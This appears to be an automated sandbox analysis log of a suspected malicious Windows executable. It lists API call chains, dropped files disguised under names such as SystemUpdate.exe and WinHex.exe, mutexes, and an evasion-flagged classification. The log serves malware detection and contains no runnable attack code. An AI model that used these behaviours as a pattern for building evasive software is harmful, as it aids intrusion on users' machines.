Source: C:\Users\user\AppData\WinHex.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054B1B1 NtQueryLicenseValue,13_2_0054B1B1
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054B274 NtQueryLicenseValue,13_2_0054B274
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004E7ACA NtPowerInformation,13_2_004E7ACA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052B0B2 RtlDosPathNameToNtPathName_U,NtCreateFile,GetProcessHeap,HeapAlloc,NtQueryInformationFile,wcsncmp,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapAlloc,GetLastError,GetLastError,NtSetInformationFile,GetProcessHeap,HeapFree,13_2_0052B0B2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005211C8 GetFileInformationByHandle,NtQueryInformationFile,RtlNtStatusToDosError,SetLastError,WriteFile,13_2_005211C8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050D55E NtYieldExecution,GetProcessHeap,HeapAlloc,13_2_0050D55E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050CACB NtYieldExecution,13_2_0050CACB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050FABD NtYieldExecution,13_2_0050FABD
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FDD47 CreateFileW,memset,GetProcessHeap,HeapFree,GetFileInformationByHandle,GetFileInformationByHandleEx,SetFileInformationByHandle,GetProcessHeap,HeapAlloc,_wcsicmp,FindClose,NtSetInformationFile,NtSetInformationFile,RtlNtStatusToDosError,CreateFileW,SetFileInformationByHandle,GetLastError,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetLastError,GetLastError,CloseHandle,GetLastError,DeleteFileW,GetLastError,GetProcessHeap,HeapFree,SetLastError,13_2_004FDD47
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051CD74 CreateFileW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryInformationFile,OpenProcess,NtQueryInformationProcess,GetProcessHeap,HeapAlloc,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetLastError,GetLastError,GetLastError,13_2_0051CD74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050FD1E NtYieldExecution,GetProcessHeap,HeapAlloc,13_2_0050FD1E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054AE25 LoadLibraryExW,GetProcAddress,NtQueryLicenseValue,FreeLibrary,13_2_0054AE25
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FE3BE: CreateFileW,DeviceIoControl,GetLastError,CloseHandle,GetLastError,GetProcessHeap,HeapFree,SetLastError,SetLastError,13_2_004FE3BE
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\Windows\Logs\MoSetup\BlueBox.logJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67367800_2_00007FF7A6736780
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6755D6C0_2_00007FF7A6755D6C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67467140_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6754E200_2_00007FF7A6754E20
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6746F980_2_00007FF7A6746F98
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6740FB40_2_00007FF7A6740FB4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67428000_2_00007FF7A6742800
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A674D7180_2_00007FF7A674D718
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6744F500_2_00007FF7A6744F50
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A675509C0_2_00007FF7A675509C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A674D0980_2_00007FF7A674D098
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67380A00_2_00007FF7A67380A0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67558200_2_00007FF7A6755820
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67467140_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6740DB00_2_00007FF7A6740DB0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6752D300_2_00007FF7A6752D30
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67465600_2_00007FF7A6746560
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A674FA080_2_00007FF7A674FA08
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6741E700_2_00007FF7A6741E70
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6748BA00_2_00007FF7A6748BA0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6740BA40_2_00007FF7A6740BA4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67413C40_2_00007FF7A67413C4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A674CC040_2_00007FF7A674CC04
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6742C040_2_00007FF7A6742C04
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6758B680_2_00007FF7A6758B68
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A6731B900_2_00007FF7A6731B90
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67409A00_2_00007FF7A67409A0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67509B40_2_00007FF7A67509B4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67411C00_2_00007FF7A67411C0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67531CC0_2_00007FF7A67531CC
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A674FA080_2_00007FF7A674FA08
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF4E2012_2_00007FF7C5BF4E20
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF5D6C12_2_00007FF7C5BF5D6C
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BD678012_2_00007FF7C5BD6780
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE671412_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE1E7012_2_00007FF7C5BE1E70
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE0DB012_2_00007FF7C5BE0DB0
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE656012_2_00007FF7C5BE6560
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BEFA0812_2_00007FF7C5BEFA08
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF2D3012_2_00007FF7C5BF2D30
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BD80A012_2_00007FF7C5BD80A0
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF509C12_2_00007FF7C5BF509C
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BED09812_2_00007FF7C5BED098
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE671412_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF582012_2_00007FF7C5BF5820
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE280012_2_00007FF7C5BE2800
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE6F9812_2_00007FF7C5BE6F98
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE0FB412_2_00007FF7C5BE0FB4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BED71812_2_00007FF7C5BED718
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE4F5012_2_00007FF7C5BE4F50
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BEFA0812_2_00007FF7C5BEFA08
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE09A012_2_00007FF7C5BE09A0
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF09B412_2_00007FF7C5BF09B4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE11C012_2_00007FF7C5BE11C0
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF31CC12_2_00007FF7C5BF31CC
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE2C0412_2_00007FF7C5BE2C04
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BECC0412_2_00007FF7C5BECC04
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE0BA412_2_00007FF7C5BE0BA4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE8BA012_2_00007FF7C5BE8BA0
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BE13C412_2_00007FF7C5BE13C4
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BF8B6812_2_00007FF7C5BF8B68
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5BD1B9012_2_00007FF7C5BD1B90
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053F60E13_2_0053F60E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005041C513_2_005041C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051D1EE13_2_0051D1EE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053A19713_2_0053A197
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005342E013_2_005342E0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005393D413_2_005393D4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054F48013_2_0054F480
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004F95CA13_2_004F95CA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051C65013_2_0051C650
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053167A13_2_0053167A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052F6F213_2_0052F6F2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005177F713_2_005177F7
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052D7FE13_2_0052D7FE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005367EE13_2_005367EE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052778313_2_00527783
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0050385913_2_00503859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051F94213_2_0051F942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053494013_2_00534940
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053197013_2_00531970
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004F490F13_2_004F490F
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0051CB3C13_2_0051CB3C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004C3B8C13_2_004C3B8C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00502BB013_2_00502BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0052EC4013_2_0052EC40
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00525C9213_2_00525C92
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00538CAC13_2_00538CAC
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004FCDC613_2_004FCDC6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00519EBC13_2_00519EBC
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577F678019_2_00007FF6577F6780
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657815D6C19_2_00007FF657815D6C
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780FA0819_2_00007FF65780FA08
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780671419_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577F80A019_2_00007FF6577F80A0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780D09819_2_00007FF65780D098
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65781509C19_2_00007FF65781509C
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780280019_2_00007FF657802800
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65781582019_2_00007FF657815820
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657804F5019_2_00007FF657804F50
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657806F9819_2_00007FF657806F98
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657800FB419_2_00007FF657800FB4
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780671419_2_00007FF657806714
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780D71819_2_00007FF65780D718
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657801E7019_2_00007FF657801E70
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657814E2019_2_00007FF657814E20
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780656019_2_00007FF657806560
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780FA0819_2_00007FF65780FA08
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657800DB019_2_00007FF657800DB0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657812D3019_2_00007FF657812D30
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578013C419_2_00007FF6578013C4
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657802C0419_2_00007FF657802C04
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF65780CC0419_2_00007FF65780CC04
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657818B6819_2_00007FF657818B68
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6577F1B9019_2_00007FF6577F1B90
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657800BA419_2_00007FF657800BA4
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF657808BA019_2_00007FF657808BA0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578011C019_2_00007FF6578011C0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578131CC19_2_00007FF6578131CC
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578009A019_2_00007FF6578009A0
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: 19_2_00007FF6578109B419_2_00007FF6578109B4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 0051B3AC appears 157 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 004FD5C3 appears 31 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 0052B6C3 appears 70 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 0054F3B3 appears 45 times
Source: C:\Users\user\AppData\SystemUpdate.exeCode function: String function: 00007FF6577F2770 appears 41 times
Source: C:\Users\user\AppData\WinHex.exeCode function: String function: 00007FF7C5BD2770 appears 41 times
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: String function: 00007FF7A6732770 appears 41 times
Source: LineInst.exe.1.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: MediaSetupUIMgr.dll.11.drStatic PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
Source: MediaSetupUIMgr.dll.11.drStatic PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-III ECOFF executable - version 3.-82
Source: MediaSetupUIMgr.dll.11.drStatic PE information: Resource name: RT_STRING type: basic-16 executable not stripped
Source: MediaSetupUIMgr.dll.11.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: SetupCore.dll.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SetupCore.dll.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: LineInst.exe.1.drStatic PE information: Resource name: RT_STRING type: GTA2 binary mission script (SCR), Industrial area (bil)
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs T1#U52a9#U624b1.0.1.exe
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658685678.0000021C65B52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs T1#U52a9#U624b1.0.1.exe
Source: setupplatform.dll.11.drBinary string: iOpening object %sFailed to get object identifier. Status: %xObjectsObject alias resolves to %sFailed to update object GUID string. Status: %xFailed to get aliased identifier. Status: %xFailed to open key for all objects. Status: %xObject GUID: %sGenerating object GUID.Creating object. Version: %d. Type: 0x%08xFailed to open object's key. Status: %xN/ABcdGetElementDataWithFlags: Failed to open key.Object: %ws Type: %ws Status: %xBcdGetElementDataWithFlags: Failed to open elements key.Object: %ws Status: %xBcdGetElementDataWithFlags: Failed to acquire BCD sync mutant. Status: %xFailed to open key for object's elements. Status: %xSetting element %08xBcdGetElementDataWithFlags: Failed to get registry value.Object: %ws Reg type: %lu Status: %xElementDeleting element %08xFailed to set registry data for element %s. Status: %xFailed to convert data for element %s. Status: %xFailed to open key for element %s. Status: %xFailed to open element %ws key for delete. Status: %xFailed to open key for all object's elements. Status: %xFailed to filter delete element %08x. Status: %xDeleting element %08x blocked by secure boot policy.Failed to get registry value. Status: %xFailed to enumerate subkeys. Status: %xFailed to Enumerate elements from %ws. Status: %xFailed to open object %ws. Status: %xFailed to enumerate subobject elements. Status: %xFailed to enumerate subelements. Status: %xFailed to get the size needed for the registry data. Status: %x\KernelObjects\BcdSyncMutantBcdOpenSystemStore: Failed to acquire BCD sync mutant.Status: %x\Registry\Machine\System\CurrentControlSet\BootConfigurationDataCreating store.Failed to create system store path. Status: %xUnable to create tempory new store key. Status: %xNewStoreRootUnable to create tempory root key. Status: %xFailed to close new store. Store: %ws Status: %xFailed to add new store from file. File: %ws Status: %xFailed to create hive. Store: %ws Status: %xFailed to get system store path. Status: %xDeleting references to object %sFailed to create store. Status: %xFailed to open new system store. Store: %ws Status: %xFailed to adopt new store. File: %ws Status: %xFailed to get system store path to delete. Status: %xDeleting the system store is only supported in WinPEReferencing object: %s.Failed to clean up references to %s. Status: %xStore will be synchronized with firmware.Opening store. Flags: 0x%xBcdOpenStore: Failed to acquire BCD sync Mutant. Store: %wsFlags: 0x%x Status: %x.logBcdOpenStore: Failed to add store from file %ws. StoreFlags: 0x%x Status: %xStore will be accessed with offline registry APIs.Store path: "%s"Failed to open system store. Status: %xBcdForciblyUnloadStore: Failed to acquire BCD sync mutant. Status: %xClosing store. Flags: 0x%xBcdCloseStore: Failed to acquire BCD sync mutant. Status: %xFailed to clear system store flag. Status: %xFailed to export alterations to firmware. Status: %xExporting alterations to firmware.Failed to export unload alterations to firmware. Status: %xExporting f
Source: setupplatform.dll.11.drBinary string: ,`\Registry\Machine\System\CurrentControlSet\Control\MiniNTFailed to delete file. Status: %xMININTSystemStartOptionsPortableOperatingSystem\Registry\Machine\SYSTEM\CurrentControlSet\ControlFailed to query processes. Status: %xFailed to allocate process ID buffer.Failed to open file attributes. Status: %xAttempting to determine owner of file %ws.Failed to query process information for size. Status: %xFailed to open process. Status: %xFound %d processes using this file.No processes are using this file.Process Name [%d]: %wsFailed to query process info. Status: %xFailed to allocate memory for space for process name.ZwFilterBootOptionpartition\ArcName\multi(%d)disk(%d)rdisk(%d)partition(%d)\??\PhysicalDrive%dSystemPartition\Registry\Machine\SYSTEM\CurrentControlSet\Control\Syspart\Device\Harddisk%lu\Partition%lu\EFI\Microsoft\Boot\bootmgfw.efiBiExportStoreAlterationsToEfi failed %xExporting store alterations to efiBiBindEfiNamespaceObjects failed %xBinding EFI namespace objectsBiBindEfiBootManager failed %xBiBuildIdentifierList failed %xBiExportStoreToEfi failed %xExporting store to efiCreated new boot entry 0x%xCreated boot entry 0x%x using cached variableBiBindEfiEntries failed %xBoot entry exists for DontSync with ID 0x%xBiExportEfiBootManager failed: %xBootNextBiExportBcdObjects failed %xBiCreateEfiEntry failed %x\Device\Harddisk%u\Partition%uSyspartGetPhysicalPartitions failed with error code: %x\??\GLOBALROOTSyspartIsSpace failed for %sBCDOBJECT=WINDOWSBiUpdateEfiEntry failed %xBiSpacesUpdatePhysicalDevicePath failed %xBiCreateBootEntry: Could not retrieve BCD Object application description. Status: %xSyspartIsSpace failed for partition path: %sTranslated a DontSync object to ID 0x%xTranslated a DontSync entry with ID 0x%xFailed to add boot entry. Status: %xZwAddBootEntryBiCreateBootEntry: Could not retrieve BCD Object application path. Status: %xBiCreateBootEntry: Could not retrieve BCD Object application device. Status: %xZwDeleteBootEntryDeleting boot entry 0x%xFailed to enumerate boot entries. Status: %xZwEnumerateBootEntriesFailed to query "%ws" variable. Status: %xZwSetSystemEnvironmentValueExZwQuerySystemEnvironmentValueExFailed to delete boot entry 0x%x. Status: %xZwSetBootEntryOrderFailed to modify boot entry 0x%x. Status: %xZwModifyBootEntryFailed to delete "%ws" variable. Status: %xZwTranslateFilePathFailed to set boot options. Status: %xZwSetBootOptionsFailed to set boot entry order. Status: %xFailed to query boot options. Status: %xZwQueryBootOptionsFailed to query boot entry order. Status: %xZwQueryBootEntryOrder%s\Partition%lu\Partition0\ArcName\multi(0)disk(0)rdisk(0)\ArcName\multi(0)disk(0)rdisk(1)multi(%d)disk(%d)rdisk(%d)
Source: classification engineClassification label: mal48.evad.winEXE@174/352@28/6
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67374B0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7A67374B0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_005011E1 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_005011E1
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00545070 GetDiskFreeSpaceExW,13_2_00545070
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054CC43 __EH_prolog3,CoCreateInstance,SysFreeString,_wcsicmp,SysFreeString,13_2_0054CC43
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\LineInst.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SetupLog
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Users\user\AppData\WinHex.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.20
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Users\user\AppData\LineInst.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Microsoft.Windows.Websetup
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\OneSettingQueryMutex+WSD+Setup360
